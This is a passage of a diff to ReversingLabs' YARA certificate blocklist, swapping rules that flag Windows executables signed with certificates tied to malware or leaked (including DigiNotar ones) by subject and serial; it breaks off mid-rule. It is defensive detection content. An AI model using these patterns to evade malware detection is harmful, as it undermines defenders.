"edf9bbface7fe943dfa4f5a6e8469802ccdbd3de9d3e6b8fabebb024c21bb9a9" score = 75 quality = 90 tags = "INFO, FILE" @@ -9512,22 +29303,22 @@ rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Foxstyle LLC" and pe.signatures[i].serial=="32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" and 1598255906<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "yinsheng xie" and pe.signatures[i].serial=="42:11:d2:e4:f0:e8:71:27:31:93:02:c5:5b:85:bc:f2" and 1360713599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_07B44Cdbfffb78De05F4261672A67312 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8751f71b-0ebb-5820-927c-684a5ae5ee7b" + id = "18787692-1233-5ea8-869c-feb530d06237" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6498-L6516" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2923979811504f78a79a2480600285a2697845e51870a44ed231a81e79807121" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L603-L619" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c88a8543782fc49d8aa68f3fc8052bd3316d10118dfb2ef2eef5006de657b6f1" score = 75 quality = 90 tags = "INFO, FILE" @@ -9537,22 +29328,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rubin LLC" and (pe.signatures[i].serial=="00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" or pe.signatures[i].serial=="ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d") and 1605358307<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Buster Paper Comercial Ltda" and pe.signatures[i].serial=="07:b4:4c:db:ff:fb:78:de:05:f4:26:16:72:a6:73:12" and 1359503999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4F8B9A1Ba5E60C754Dbb40Ddee7905E2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c2564461-6731-5d7b-8dbb-560929b568d0" + id = "9b6ba6bb-a796-59e1-a38b-04d4b60a99a6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6518-L6536" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2a3353c655531b113dc019a86288310881e3bbcb6c03670a805f22b185e09e6c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L621-L637" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2a0d07d47cd41db5dc170a29607b6c1f2e3b7c0785f83b211f68f9cb9368e350" score = 75 quality = 90 tags = "INFO, FILE" @@ -9562,22 +29353,22 @@ rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "212 NY Gifts, Inc." and (pe.signatures[i].serial=="00:11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" or pe.signatures[i].serial=="11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a") and 1605515909<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NOX Entertainment Co., Ltd" and pe.signatures[i].serial=="4f:8b:9a:1b:a5:e6:0c:75:4d:bb:40:dd:ee:79:05:e2" and 1348617599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A389B95Ee736Dd13Bc0Ed743Fd74D2F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cd643ad5-254a-5c53-a6f2-b263ff539cd3" + id = "43cce248-2322-5607-8706-aeab046a30b9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6538-L6556" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4242ef4a30bb09463ec5a6df9367915788a2aa782df6c463bcf966d2aad63c1d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L639-L655" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8b83e4aa47cea7cadf4b4a9f4e044478a62f4233e082fb52f9ed906d80a552aa" score = 75 quality = 90 tags = "INFO, FILE" @@ -9587,22 +29378,22 @@ rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLOMATIC d.o.o." and (pe.signatures[i].serial=="00:5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" or pe.signatures[i].serial=="5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99") and 1605006199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BUSTER ASSISTENCIA TECNICA ELETRONICA LTDA - ME" and pe.signatures[i].serial=="0a:38:9b:95:ee:73:6d:d1:3b:c0:ed:74:3f:d7:4d:2f" and 1351814399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1A3Faaeb3A8B93B2394Fec36345996E6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "85df653a-a4a3-5d0e-86f4-cad0249cd3d3" + id = "343e4dbe-21a6-5758-be81-e5e7918c54fa" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6558-L6576" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c77881e0365c9fc398097d0b6e077330a5f0fcbb53279bfde96b3c01df914c55" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L657-L673" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a3bd9aaba8dbdb340b5d3013684584524eb08b11339985ba6ca0291b8c8bc692" score = 75 quality = 90 tags = "INFO, FILE" @@ -9612,22 +29403,22 @@ rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sportsonline24 B.V." and (pe.signatures[i].serial=="00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" or pe.signatures[i].serial=="82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2") and 1605117874<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "salvatore macchiarella" and pe.signatures[i].serial=="1a:3f:aa:eb:3a:8b:93:b2:39:4f:ec:36:34:59:96:e6" and 1468454400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1A35Acce5B0C77206B1C3Dc2A6A2417C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4446aead-9505-545a-8d3a-6ad844d348d3" + id = "0e42ffb8-07f2-55e4-977d-7760e923d76d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6578-L6596" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "803d70dddeff51b753b577ea196b12570847c6875ae676a2d12cf1ca9323be34" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L675-L691" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ce161fdd511e0efa042516ead09c6ab5f8dcf54f2087cdccbfed8e7cdfbd25b2" score = 75 quality = 90 tags = "INFO, FILE" @@ -9637,22 +29428,22 @@ rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AI Software a.s." and (pe.signatures[i].serial=="00:9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" or pe.signatures[i].serial=="9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00") and 1592442000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "cd ingegneri associati srl" and pe.signatures[i].serial=="1a:35:ac:ce:5b:0c:77:20:6b:1c:3d:c2:a6:a2:41:7c" and 1166054399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6Eb40Ea11Eaac847B050De9B59E25Bdc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6b992971-6a1f-53e3-8651-f25a6b761c41" + id = "e9f94ae9-0158-5789-b4d2-88f750442274" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6598-L6616" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bd198665ae952e11c91adc329908e3cd55a55365875200cd81d2f71fd092f1fe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L693-L709" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d0e7ab78fb42c9a8f19cba8e6a8b15d584651a23f1088e1f311589d46145e963" score = 75 quality = 90 tags = "INFO, FILE" @@ -9662,22 +29453,22 @@ rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kommservice LLC" and (pe.signatures[i].serial=="00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" or pe.signatures[i].serial=="95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5") and 1604933746<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "My Free Internet Update" and pe.signatures[i].serial=="6e:b4:0e:a1:1e:aa:c8:47:b0:50:de:9b:59:e2:5b:dc" and 1062201599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6724340Ddbc7252F7Fb714B812A5C04D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bc3f54a6-723d-5de5-9a59-2be8a005cedc" + id = "2b61de88-9fea-5c3f-a7ab-db91e90b4965" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6618-L6634" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b9fb2e3cc150b0278e67c673f7c01174c30b2cc4458c9c5e573661071795b793" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L711-L727" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bc72c2ca5f81198684233e23260831da5b9ef4e7ac5a25abbdb303eecc38bd53" score = 75 quality = 90 tags = "INFO, FILE" @@ -9687,22 +29478,22 @@ rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Istok" and pe.signatures[i].serial=="13:35:65:77:98:08:c3:b7:9d:8e:3f:70:a9:c3:ff:ac" and 1605019819<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "YNK JAPAN Inc" and pe.signatures[i].serial=="67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" and 1306195199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0813Ee9B7B9D7C46001D6Bc8784Df1Dd : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4668ceb3-8bf2-5be4-9a1a-d0d902c35cf0" + id = "0915fae0-ac6f-5a92-ab44-80f840fd5061" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6636-L6654" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f13f9b70a2a3187522e4fff45a8a425863ad6242f82592aa9319c8d5fddeeefa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L729-L745" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1a25a2f25fa8d5075113cbafb73e80e741268d6b2f9e629fd54ffca9e82409b0" score = 75 quality = 90 tags = "INFO, FILE" @@ -9712,22 +29503,22 @@ rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Orangetree B.V." and (pe.signatures[i].serial=="00:7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" or pe.signatures[i].serial=="7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c") and 1606159604<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Les Garcons s'habillent" and pe.signatures[i].serial=="08:13:ee:9b:7b:9d:7c:46:00:1d:6b:c8:78:4d:f1:dd" and 1334707199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_530591C61B5E1212F659138B7Cea0A97 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "871e399f-8498-5d66-ab5e-24e48491124f" + id = "71cf0653-5aab-5d5c-aa3a-f42f40196412" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6656-L6674" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1020250fc5030e50bc1e7d0f0c5a77e462a53f47bfcc4383c682b34fed567492" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L747-L763" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ef01e542d145475713bbd373bdcdae5f25bfd823a60e7d40fe9a6b6039c83e0" score = 75 quality = 90 tags = "INFO, FILE" @@ -9737,22 +29528,22 @@ rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fort LLC" and (pe.signatures[i].serial=="00:ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c" or pe.signatures[i].serial=="ba:d3:5f:d7:00:25:d4:6c:56:b8:9e:32:b1:a3:95:4c") and 1604937337<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x97\\xA5\\xE7\\x85\\xA7\\xE5\\xB3\\xB0\\xE5\\xB7\\x9D\\xE5\\x9B\\xBD\\xE9\\x99\\x85\\xE7\\x9F\\xBF\\xE4\\xB8\\x9A\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="53:05:91:c6:1b:5e:12:12:f6:59:13:8b:7c:ea:0a:97" and 1403654399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_07270Ff9 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "2a949015-3b7b-5123-8df1-f2199ef636c9" + id = "fcd2d82a-b51d-53ff-bfae-3c83147c1903" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6676-L6692" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "49d6fd8b325df4bc688275a09cee35e1040172eb6f3680aa2b6f0f3640c0782e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L765-L781" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8f0da7c330464184fa1d5bf8d51dd8ad2e8637710a36972dcab03629cb57e910" score = 75 quality = 90 tags = "INFO, FILE" @@ -9762,22 +29553,22 @@ rule REVERSINGLABS_Cert_Blocklist_7B91468122273Aa32B7Cfc80C331Ea13 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO KBI" and pe.signatures[i].serial=="7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" and 1586942863<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Cyber CA" and pe.signatures[i].serial=="07:27:0f:f9" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0727100D : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "adff6ae2-076c-5c97-9fea-f95d770a3821" + id = "1ee866ec-a445-5a79-b824-37f28a49f20b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6694-L6710" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e36ae57d715a71aa7d26dd003d647dfa7ab16d64e5411b6c49831544fc482645" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L783-L799" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a09f4004ed002b90d67a3baddde74832e6c7b70e8b330347ef169460750aa344" score = 75 quality = 90 tags = "INFO, FILE" @@ -9787,22 +29578,22 @@ rule REVERSINGLABS_Cert_Blocklist_3E267B5D14Cdf1F645C1Ec545Cec3Aee : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO KBI" and pe.signatures[i].serial=="3e:26:7b:5d:14:cd:f1:f6:45:c1:ec:54:5c:ec:3a:ee" and 1579825892<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Cyber CA" and pe.signatures[i].serial=="07:27:10:0d" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_07271003 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "5b8e7730-cb8b-5c51-9784-d944453bc898" + id = "7573c436-5bf9-5522-9952-e30dbbccd092" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6712-L6730" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "23570962c80bddce28a3dee9d4d864cf3cf64018eec6fbcbdd3ca2658c9f660f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L801-L817" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "14c201b4fdda5b3553732a173a3d6705129c54f2a50d26997d63a77be8504285" score = 75 quality = 90 tags = "INFO, FILE" @@ -9812,22 +29603,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ae6D3C0269Ef6497E14379C51A8507Ba : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VELES PROPERTIES LIMITED" and (pe.signatures[i].serial=="00:ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba" or pe.signatures[i].serial=="ae:6d:3c:02:69:ef:64:97:e1:43:79:c5:1a:85:07:ba") and 1578566034<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Cyber CA" and pe.signatures[i].serial=="07:27:10:03" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_013134Bf : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "f0050a52-65d5-54b2-b06d-08812af98948" + id = "a3292707-c481-56a8-abf9-e1a762c76cb6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L6732-L6750" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "230d33f0d1d31d4cb76bf3b13f109d3cc9ace846daef145e1dc7666b33c8a42a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L819-L835" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1ade100c310c22bce25bcc6687855bd4eb6364b64cf31514b2548509a16e4a36" score = 75 quality = 90 tags = "INFO, FILE" @@ -9837,22 +29628,22 @@ rule REVERSINGLABS_Cert_Blocklist_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pivo ZLoun s.r.o." and (pe.signatures[i].serial=="00:fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" or pe.signatures[i].serial=="fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e") and 1604019600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar PKIoverheid CA Organisatie - G2" and pe.signatures[i].serial=="01:31:34:bf" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7C061Baa3118327255161F6A7Fa4E21D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_01314476 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "f597956a-d11b-54e4-91b6-0572c0b10279" + id = "e0a52ad1-cebd-5ffc-953f-e0b09fc6d710" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 